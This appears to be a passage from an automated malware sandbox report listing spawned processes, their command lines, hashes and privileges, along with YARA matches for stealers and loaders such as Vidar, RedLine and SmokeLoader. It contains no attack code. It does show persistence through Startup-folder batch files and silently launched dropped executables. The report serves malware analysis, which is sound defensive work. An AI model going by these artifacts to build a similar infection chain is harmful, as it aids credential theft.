                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:4
                                                                                                                          Start time:08:52:16
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
                                                                                                                          Imagebase:0xec0000
                                                                                                                          File size:42'064 bytes
                                                                                                                          MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:5
                                                                                                                          Start time:08:52:16
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          Wow64 process (32bit):
                                                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
                                                                                                                          Imagebase:
                                                                                                                          File size:42'064 bytes
                                                                                                                          MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:6
                                                                                                                          Start time:08:52:16
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                          Imagebase:0x7ff7e52b0000
                                                                                                                          File size:55'320 bytes
                                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:7
                                                                                                                          Start time:08:52:16
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Windows\System32\WerFault.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\WerFault.exe -pss -s 460 -p 1892 -ip 1892
                                                                                                                          Imagebase:0x7ff683db0000
                                                                                                                          File size:570'736 bytes
                                                                                                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:8
                                                                                                                          Start time:08:52:17
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Windows\System32\WerFault.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 1892 -s 55932
                                                                                                                          Imagebase:0x7ff683db0000
                                                                                                                          File size:570'736 bytes
                                                                                                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:10
                                                                                                                          Start time:08:52:29
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ObMJW0CQyivHFgrnQOjeFbMk.bat" "
                                                                                                                          Imagebase:0x7ff619040000
                                                                                                                          File size:289'792 bytes
                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:11
                                                                                                                          Start time:08:52:29
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:12
                                                                                                                          Start time:08:52:38
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tOLiiaY6ffsKgwiVZfFcFIn0.bat" "
                                                                                                                          Imagebase:0x7ff619040000
                                                                                                                          File size:289'792 bytes
                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:13
                                                                                                                          Start time:08:52:38
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:14
                                                                                                                          Start time:08:52:38
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:1'956'920 bytes
                                                                                                                          MD5 hash:17B5157E8F35F33EB2325EE5751BCF3B
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:low
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:15
                                                                                                                          Start time:08:52:38
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp" /SL5="$4043A,1591872,56832,C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:706'560 bytes
                                                                                                                          MD5 hash:F1EEAE7DAB5E51B2A76DB6651423C9F5
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:low
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:16
                                                                                                                          Start time:08:52:40
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe" -i
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:1'888'210 bytes
                                                                                                                          MD5 hash:7BFD8C9EBE20C4BF0BED7F74A74E8646
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000010.00000000.2385672788.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe, Author: Joe Security
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 37%, ReversingLabs
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:17
                                                                                                                          Start time:08:52:41
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe" -s
                                                                                                                          Imagebase:0x7ff6068e0000
                                                                                                                          File size:1'888'210 bytes
                                                                                                                          MD5 hash:7BFD8C9EBE20C4BF0BED7F74A74E8646
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000011.00000000.2392543907.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000011.00000002.3389219004.0000000000908000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:19
                                                                                                                          Start time:08:52:51
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3hhfUEZjih0hfMNE0tjXJNip.bat" "
                                                                                                                          Imagebase:0x7ff619040000
                                                                                                                          File size:289'792 bytes
                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:20
                                                                                                                          Start time:08:52:51
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:21
                                                                                                                          Start time:08:52:56
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:2'146'090 bytes
                                                                                                                          MD5 hash:0D69DD3893505245669619A06840C2FE
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:22
                                                                                                                          Start time:08:52:57
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\syncUpd.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\syncUpd.exe
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:204'288 bytes
                                                                                                                          MD5 hash:220CB1B1688C2364B9AB272E37B896F3
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000016.00000002.3387790910.00000000008C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000016.00000002.3387790910.00000000008C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000016.00000002.3387790910.00000000008C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000016.00000002.3368358435.0000000000652000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000016.00000002.3346089209.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000016.00000002.3346089209.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000016.00000002.3370913149.0000000000668000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000016.00000003.2595832713.00000000008F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000016.00000003.2595832713.00000000008F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:23
                                                                                                                          Start time:08:53:00
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe" --silent --allusers=0
                                                                                                                          Imagebase:0x390000
                                                                                                                          File size:2'960'760 bytes
                                                                                                                          MD5 hash:918151F14C10B6BB7533F6D97BF22D2D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:24
                                                                                                                          Start time:08:53:00
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2c0,0x2f0,0x6c1121c8,0x6c1121d4,0x6c1121e0
                                                                                                                          Imagebase:0x390000
                                                                                                                          File size:2'960'760 bytes
                                                                                                                          MD5 hash:918151F14C10B6BB7533F6D97BF22D2D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:25
                                                                                                                          Start time:08:53:00
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:175'104 bytes
                                                                                                                          MD5 hash:89B400AF781E7D55812A77260DC1D9C8
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000019.00000002.2841867829.0000000000831000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000019.00000002.2841867829.0000000000831000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000019.00000002.2841787321.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000019.00000002.2841815394.0000000000810000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000019.00000002.2841815394.0000000000810000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000019.00000002.2841630563.00000000004F2000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:26
                                                                                                                          Start time:08:53:02
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Pictures\1V9g5oUcP4AKlGIaRK4CDHUH.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:2'146'090 bytes
                                                                                                                          MD5 hash:0D69DD3893505245669619A06840C2FE
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:27
                                                                                                                          Start time:08:53:02
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:1'828'864 bytes
                                                                                                                          MD5 hash:EEE5DDCFFBED16222CAC0A1B4E2E466E
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:Borland Delphi
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000001B.00000002.3339978515.0000000000401000.00000040.00000001.01000000.00000019.sdmp, Author: Joe Security
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 75%, ReversingLabs
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:28
                                                                                                                          Start time:08:53:03
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\Pictures\93gthV73eSBvEuNxXjo0G1yI.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Pictures\93gthV73eSBvEuNxXjo0G1yI.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:175'104 bytes
                                                                                                                          MD5 hash:89B400AF781E7D55812A77260DC1D9C8
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000001C.00000002.3370878314.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001C.00000002.3386959537.0000000000732000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:29
                                                                                                                          Start time:08:53:04
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\Pictures\FNi4gQqkHn29EqnTv0rxfxe1.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Pictures\FNi4gQqkHn29EqnTv0rxfxe1.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:1'956'920 bytes
                                                                                                                          MD5 hash:17B5157E8F35F33EB2325EE5751BCF3B
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:30
                                                                                                                          Start time:08:53:04
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\Pictures\HjvCaWONZRgrucQ7NCpBwfHi.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Pictures\HjvCaWONZRgrucQ7NCpBwfHi.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:2'146'090 bytes
                                                                                                                          MD5 hash:0D69DD3893505245669619A06840C2FE
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:31
                                                                                                                          Start time:08:53:07
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\Pictures\xzRRQmj1LpBxF1iTy72H1YWe.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Pictures\xzRRQmj1LpBxF1iTy72H1YWe.exe" --silent --allusers=0
                                                                                                                          Imagebase:0xcd0000
                                                                                                                          File size:2'960'760 bytes
                                                                                                                          MD5 hash:BCC38593B03EE04D072E36C9513BCF54
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:32
                                                                                                                          Start time:08:53:07
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\Pictures\eofj7Pf9I3ORdN1nDBhGJIZl.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Pictures\eofj7Pf9I3ORdN1nDBhGJIZl.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:175'104 bytes
                                                                                                                          MD5 hash:89B400AF781E7D55812A77260DC1D9C8
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000020.00000002.3324630300.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000020.00000002.3324821241.0000000000722000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:33
                                                                                                                          Start time:08:53:07
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\Pictures\jUzz7ezNBFbkGCxJO9DOH9dj.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Pictures\jUzz7ezNBFbkGCxJO9DOH9dj.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:1'956'920 bytes
                                                                                                                          MD5 hash:17B5157E8F35F33EB2325EE5751BCF3B
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:34
                                                                                                                          Start time:08:53:07
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\Pictures\NuRMT0uazLQnmOJibnohOTUR.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Pictures\NuRMT0uazLQnmOJibnohOTUR.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:2'146'090 bytes
                                                                                                                          MD5 hash:0D69DD3893505245669619A06840C2FE
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:35
                                                                                                                          Start time:08:53:07
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\Pictures\N82pZRBoHBOB1dfNMGUFcUyF.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Pictures\N82pZRBoHBOB1dfNMGUFcUyF.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:4'283'784 bytes
                                                                                                                          MD5 hash:F0A6999F1BC47C6C468CF6DB95003AD5
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000023.00000002.3279720319.0000000001079000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000023.00000002.3376249568.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:36
                                                                                                                          Start time:08:53:07
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exe" --silent --allusers=0
                                                                                                                          Imagebase:0xe10000
                                                                                                                          File size:2'960'760 bytes
                                                                                                                          MD5 hash:442BA51AC0AF3E8D9F489F643AFA6268
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:37
                                                                                                                          Start time:08:53:07
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\Pictures\Rk1pfEVtKjXZKi5E0UJ5igqM.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Pictures\Rk1pfEVtKjXZKi5E0UJ5igqM.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:175'104 bytes
                                                                                                                          MD5 hash:89B400AF781E7D55812A77260DC1D9C8
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000025.00000002.3137395585.00000000007C2000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000025.00000002.3136775469.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000025.00000002.3136797413.0000000000600000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000025.00000002.3136797413.0000000000600000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000025.00000002.3136899617.0000000000621000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
